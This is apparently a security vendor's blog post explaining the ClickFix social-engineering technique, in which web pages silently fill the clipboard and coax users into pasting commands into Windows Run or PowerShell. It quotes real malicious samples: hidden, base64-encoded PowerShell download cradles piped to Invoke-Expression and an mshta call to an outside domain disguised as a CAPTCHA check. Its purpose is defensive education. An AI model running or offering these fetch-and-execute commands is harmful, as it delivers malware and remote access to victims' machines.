Threat Posts

ClickFix: The What, Why, Where, and How of it All

Erin Kuffel
June 17, 2025

What is ClickFix?
Silent Copying to Clipboard

ClickFix is a deceptive social engineering tactic used by threat actors to manipulate users into unwittingly allowing a web page to populate the clipboard silently. Ultimately, the attacker is attempting to get a user to (unknowingly) execute malicious code, gathered from the browser and quietly placed into the user’s clipboard, on the host machine. 

This technique was first coined as “ClickFix” because the social engineering prompts were telling the user they ought to “fix” a problem with their browser. Now, however, the term ClickFix is often ascribed to any similar attack, one in which a page auto-populates the victim’s clipboard and prompts the user to paste the malicious code into a device’s terminal. 

What is a Typical Encounter?

Unlike traditional malware delivery mechanisms that exploit software vulnerabilities, ClickFix relies on user actions. It typically begins with a user browsing to a malicious site or compromised web page and encountering a prompt instructing the user first to click a button and then to paste malicious code into a trusted host interface, such as the Windows Run dialog (accessed with Windows key + R) or an administrative PowerShell terminal.

Image of Windows Run terminal (opened by clicking the Windows button + R), with malicious PowerShell code pasted into it.
Image of Windows Run terminal (opened by clicking the Windows button + R), with malicious PowerShell code pasted into it.

Upon pressing Enter, the attacker’s code often downloads additional malware, next-stage payloads, and remote access to the user’s device—initiating a slew of harmful actions.

Why is ClickFix a Threat?
Lateral Movement, from Browser to Host Machine

ClickFix represents a clear attempt at lateral movement—from initial code execution within the browser to compromising the underlying host machine. This transition is often made via download cradles initiated by the clipboard-pasted commands.

Some example download cradles include PowerShell commands, often encoded and almost always in a hidden terminal, like:

pOWeRSHelL -W HIDdEn "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vZGlydmVy...') | iex"

Partial PowerShell code snippet, copied to the user’s clipboard, from a malicious site.

ipconfig /flushdns
	
$Diagnostics = "U2V0LUNsaXBib2FyZCAtVmFsdWUgIiAiOw==";
$MUI = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($Diagnostics));
Invoke-Expression $MUI;
	
[System.Diagnostics.Process]::Start("powershell", "-ep RemoteSigned -w 1 -enc `"JABSAEQAIAA9ACAAWwBiAG8AbwBsAF0AQAAoADAAeAAwADEAQgBFACkAOwAkAFUATwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAIgBhAEgAUgAwAGMASABNADYATAB5ADkAeQBaAFcANQAwAGMAbgBrAHUAWQAyADgAdgBaAEgAbAA2AE4AagBZADEAYwBtAEkAdgBjAG0ARgAzACIAKQApADsAJABDAE8AIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAFMATwBGACAAPQAgACQAQwBPAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJABVAE8AKQA7AGkAZQB4ACAAJABTAE8ARgA7ACQAbgB1AGwAbAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4AQQByAHIAYQB5AEwAaQBzAHQAXQA=`"") | Out-Null;
	
exit;
0

Another PowerShell example, discussed in more detail in this blog post.

Other real-world examples observed use other living off the land binaries (a.k.a., LOTLs, LOLBins, and LOLBAS), such as mshta, to perform downloads and subsequent malware execution:

mshta https://simplerwebs.world/mine.json #  ✅ ''I am not a robot - reCAPTCHA Verification ID: 2165

Mshta.exe call, copied to the user’s clipboard, from a malicious site.

Within Keep Aware’s browser-based attacker TTP framework, ClickFix is tracked under the Lateral Movement tactic. The goal of ClickFix and similar attacks is clear: get users to transfer the threat from the browser environment into the host device, where much more damage can be done to the user, their data, and the organization.

Where Has ClickFix Been Spotted? 

ClickFix has been observed on both maliciously crafted sites and legitimate but compromised web pages. Threat actors rely on three primary avenues to lure users into these traps: malvertising, SEO poisoning, and phishing emails.

ClickFix has been observed in a variety of threat campaigns, often disguised as fake prompts:

Fake Browser Update Prompts: Most notably in the ClearFake campaign, where users are tricked into believing their browser is out of date or has some sort of issue. A modal window appears with instructions to copy/paste commands into Windows+R (the Windows Run dialog).

A compromised web page social engineers a user to “fix” their browser by pasting malicious code into an administrative PowerShell terminal. When the user clicks the "Copy fix" button, the user unknowingly has allowed JavaScript to populate the system clipboard with the malicious code.

Fake CAPTCHA Pages: These are increasingly popular. Users are told to “verify” themselves by following step-by-step instructions—including clipboard manipulation and system command execution.

Two malicious sites each prompt a user to “verify” they are not a robot. Upon clicking the fake CAPTCHA, the web page silently populates the system clipboard with malicious code and the user encounters steps to "prove" they are human—by pasting the malicious code into the Windows Run dialog terminal.

These ClickFix-style threats have also made their debut in sophisticated attacks, leading to the deployment of information stealers and remote access tools, such as recent Discord invite links that were hijacked. This campaign used the ClickFix technique on a fake CAPTCHA page to ultimately deliver a Skuld Stealer targeting cryptocurrency wallets and AsyncRAT, providing an attacker with remote access to victim devices.

How to Spot ClickFix?

Often shown in a modal overlay, the hallmark of a ClickFix attempt is a prompt with phrasing like:

"Copy the below command" or “Click the button

and

"Open Windows Button + R and paste this" or “Open Windows PowerShell and right-click

These cues should immediately raise red flags. No legitimate website will ever instruct a user to paste something from the clipboard into a terminal.

Examples of what ClickFix prompts may look like.

Conclusion

ClickFix attacks attempt to persuade a user to unknowingly copy, paste, and execute malicious code from the browser onto the host device. These attacks rely entirely on two key factors: user compliance and the browser’s access to the system clipboard. This is precisely where visibility and enforcement matter most. Keep Aware, a browser security platform, is purpose-built to detect these deceptive interactions, in real time, in the browser. 

By monitoring clipboard access patterns, identifying suspicious web pages, and disrupting lateral movement techniques like ClickFix, Keep Aware empowers organizations to stop attacks before they jump from browser to host.

ClickFix is simple and straightforward, but its consequences are not. As a rule of thumb:

Never follow a prompt to open a system application, like Windows Run or PowerShell, and paste text from an unexpected web page.

Share
Follow Keep Aware
Subscribe to Keep Aware

Stay up to date with the latest threat posts and browser security news from Keep Aware

Thank you for following Keep Aware!
Oops! Something went wrong while submitting the form.
Ready to see Keep Aware in action?
Schedule a personalized demo today and see how Keep Aware can protect your organization's biggest workplace.